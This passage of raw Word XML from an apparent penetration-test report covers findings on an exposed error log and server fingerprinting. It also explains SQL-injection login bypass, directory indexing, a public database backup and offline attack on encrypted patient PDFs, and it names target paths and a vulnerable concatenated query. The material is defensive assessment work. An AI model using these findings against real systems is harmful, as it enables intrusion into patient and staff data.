                      <a:ext cx="5577840" cy="3002781"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Related evidence: patient directory exposes storage/log metadata while direct reports directory is protected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sequential report identifiers and a disclosed storage path reduce discovery effort.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Direct browsing of /patient/reports/ returned HTTP 403, which is positive directory protection, but the path itself remained discoverable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Use opaque identifiers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>store files outside the web root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>authorize downloads against record ownership</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>return uniform responses for unknown/unauthorized IDs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sequential or guessed identifiers must not expose unauthorized objects; storage paths must not be directly browsable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>F-07 — Public disclosure of error-log filename/metadata</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CRITICALITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CVSS v3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B45309"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The /patient/ directory listing disclosed an error_log filename and metadata, including an approximately 243 KB file size in the captured listing. The evidence does not establish that the log contents were directly readable, so no log-content disclosure is claimed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Knowing a log exists and its filename can help an attacker target error-handling artifacts. The final severity depends on whether the file is readable and whether it contains secrets or stack traces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="3002781"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="12_Error_Log_Metadata.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="3002781"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: error_log filename and metadata in directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Directory indexing reveals an application error log filename and metadata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The evidence does not establish that the log contents were directly readable, so no log-content disclosure is claimed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Keep logs outside the web root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>deny direct access to *.log and error_log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>rotate and protect logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>monitor unusual requests for log filenames.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Direct requests for error_log and log extensions must be denied; logs must reside outside the public document root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>F-08 — Server/hosting fingerprint disclosure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CRITICALITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CVSS v3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="DCFCE7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The web and hosting stack disclosed service and platform fingerprints, including LiteSpeed and reverse-proxy/openresty behavior. Service enumeration also identified shared-hosting management and mail services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Fingerprinting is generally defense-in-depth. It becomes materially important when a specific exposed component is vulnerable, but this assessment did not establish such an exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Observed fingerprints include LiteSpeed, HAProxy/openresty behavior and shared-hosting service banners. Direct-to-IP HTTP behavior differed from hostname behavior, which is consistent with host-based routing/SNI and is not itself classified as a vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Web and hosting-layer fingerprints are externally observable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Service enumeration also identified shared-hosting management and mail services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Minimize unnecessary version banners</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>keep reverse-proxy and origin software patched</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>reduce management exposure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>verify that shared-hosting services are intentionally reachable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Unnecessary version details should be minimized and exposed services should remain patched and intentionally reachable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>6. Technical Foundations — What the Evidence Means</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This section explains the observed weaknesses in plain technical language before the report returns to the exploitation narrative. It is included so a reviewer who is not yet experienced with web application security can understand why each response is significant and how the individual controls are supposed to work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>6.1 What an HTTP authentication boundary should do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A login endpoint normally receives a username and password, verifies those values against a trusted identity store, and creates an authenticated session only when the verification succeeds. The security invariant is simple: an invalid credential set must never produce the same authenticated state as a valid credential set. In this assessment, the baseline request and the controlled SQL input produced materially different states even though the supplied password remained invalid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Why the baseline matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A professional exploit record begins with a baseline because a single response can otherwise be misinterpreted. Here, the baseline returned HTTP 200, 2,281 bytes and no redirect. The exploit request returned HTTP 302 and a Location header pointing to portal.php. The controlled variable was the username field. This makes the state transition attributable to the input change rather than to a generic portal redirect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Conceptual SQL injection model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The following is an illustrative model, not recovered source code. It shows the class of coding error that can produce the observed behavior:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="259" w:right="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>SELECT id FROM users WHERE username = '$username' AND password = '$password';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>If application code builds a query by concatenating untrusted text, quote characters can terminate a string literal and comment syntax can cause the remainder of a predicate to be ignored. Parameterized queries prevent the database from treating the supplied value as executable SQL syntax. In a secure implementation, the username is data, not part of the SQL program.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>6.4 Why the SQL error is a separate finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Verbose SQL errors and SQL injection are related but distinct controls. SQL injection is the ability to alter database query semantics. Error disclosure is the failure to hide internal implementation details from the requester. Even if parameterization is corrected, production error handling should still prevent database-driver messages, stack traces and query fragments from reaching users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>6.5 Directory indexing in beginner terms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A normal web server can return a list of files when a directory has no index document and auto-indexing is enabled. That behavior is convenient for public file repositories but dangerous for application directories. The server in this assessment effectively turned internal file names into a menu: the attacker could browse the directory first and then request the interesting file directly. robots.txt does not change this because robots.txt tells crawlers what to avoid; it does not enforce authorization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>6.6 Why the backup is more serious than an ordinary file leak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The exposed object was not a harmless image or obsolete public document. It was a structured database backup with table definitions and rows. A structured backup gives an attacker a reusable dataset: records can be searched, aggregated, correlated and copied without additional parsing of a human-readable page. The captured header itself labels the database as confidential, making the deployment contradiction especially clear.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>6.7 Application authorization versus document encryption</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The patient-report path demonstrates two different security layers. Application authorization decides whether a user may retrieve a report. PDF encryption protects the file if someone obtains the file without the password. The assessment shows why the first control must be correct even when the second exists: once the application returns the encrypted file, the attacker can work on it offline without further interaction with the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>6.8 What CVSS is and is not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CVSS is a technical scoring system for communicating severity characteristics such as network reachability, attack complexity, privileges, user interaction and impact. It is not a legal conclusion, a prediction of financial loss or a replacement for business context. Scores marked with an asterisk are retained as provisional values from the assessment where environmental assumptions matter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>7. Evidence-to-Finding Traceability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A high-quality penetration test should allow a reviewer to walk backward from a finding to the exact artifact that proves it. The matrix below provides that traceability.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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Primary evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Secondary evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Boundary / limitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Directory-index screenshots for /old/, /patient/ and /staff/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTML and command register</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Directory listing is confirmed; no claim that every listed file is readable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public SQL backup artifact and browser evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Payroll/shareholder analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exposure is directly confirmed; legal/regulatory consequences are outside scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Baseline/exploit HTTP differential and Burp response</w:t>
